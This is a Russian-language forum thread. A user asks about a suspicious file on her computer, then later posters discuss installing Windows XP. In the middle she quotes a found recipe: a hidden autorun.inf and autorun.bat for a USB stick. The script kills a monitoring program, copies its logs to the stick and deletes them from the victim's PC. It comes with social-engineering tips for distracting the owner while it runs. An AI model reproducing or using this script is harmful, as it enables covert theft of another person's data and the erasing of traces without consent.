у меня стоит AnVir Task Manager - вроде бы это аналог Autoruns...
вот его скрин
А может не париться и просто удалить этот файлик ???(из папки)
|
у меня стоит AnVir Task Manager - вроде бы это аналог Autoruns...
вот его скрин
А может не париться и просто удалить этот файлик ???(из папки)
Кто победил тот и Добро
Можно попробовать )) Но вы его куда-то переместите на всякий случай а потом, если без него все будет окей, удалите
You Will Respect My Authoritah!
Приложение удалила безвозвратно....
И вот что еще нагуглила....
А смысл такой: нужно сделать так, что бы при открытии вашей флэшки, логи Эксперта копировались на нее, далее вы логи на своем эксперте заменяете этими логами (эксперт на это время нужно выгрузить из памяти). И смотрите на своем компе.
Теперь на вашей флэшке создадим два файла:
Первый - autorun.inf
Запишем в него следующее:
[autorun]
shellexecute=autorun.bat
Теперь второй - autorun.bat
Запишем в него следующее:
@echo off
if exist f:\exprep goto Good
taskkill /f /im expmon.exe>nul
md f:\exprep
xcopy c:\WINDOWS\exprep f:\exprep /s /e /h >nul
attrib -h -s -r c:\WINDOWS\exprep\*.* >nul
del c:\WINDOWS\exprep\*.* /q >nul
start c:\WINDOWS\expmon.exe >nul
:Good
explorer.exe .
Установите атрибут Скрытый для обоих файлов.
Немного пояснений по autorun.bat:
Проверяется наличие папки f:\exprep, если она есть, то идет переход к метке Good. Поэтому необходимо убирать папку f:\exprep после того, как скопируете логи с флэшки;
Убивается процесс эксперта в памяти;
Создается папка f:\exprep;
Копируются логи на флэшку;
Удаляются логи с компа, чтобы каждый раз копировались только новые логи, а старые удалялись;
Эксперт опять загружается в память;
последняя команда открывает содержимое флэшки в проводнике.
Чтобы поизошел автозапуск нужно открывать флэшку через Мой компьютер.
Социальная инженерия: копируете несколько файлов на флэшку, например, фотки. Далее под предлогом их показать, вставляете флэшку, открываете ее содержимое через Мой компьютер, показываете фотки (в это время копируются логи), далее отвлекаетесь на что-нить другое (чтобы логи до конца докопировались, если их много). Вот и все.
Если автозапуск не будет работать, то просто запускаете этот BAT файл с флэшки вручную.
И что за вредитель посидел за моим компом?
Спасибо большое за участие....
Кто победил тот и Добро
Добрый вечер!Купила сегодня новый ноутбук,подскажите как установить на него Windows Vista
Смело товарищи в ногу!!!!!!!!!!!
Да он шел с нею в комплектеМне откровенно говоря совсем не хочется ею пользоваться
если решите ставить хр то все драйвера которые понадобятся тут
«The World Is Yours»
виста это невиндоус, эт переходная гадость. лутше уж ставить ХР или 7мерку, хотя с 7меркой яб ешо подождал чуток чтоб подправили все бока
Ой ребята спасибо огромное всем!!!Сегодня поставила ХР 2009 г.Спасибо за ссылки и участие
![]()
Социальные закладки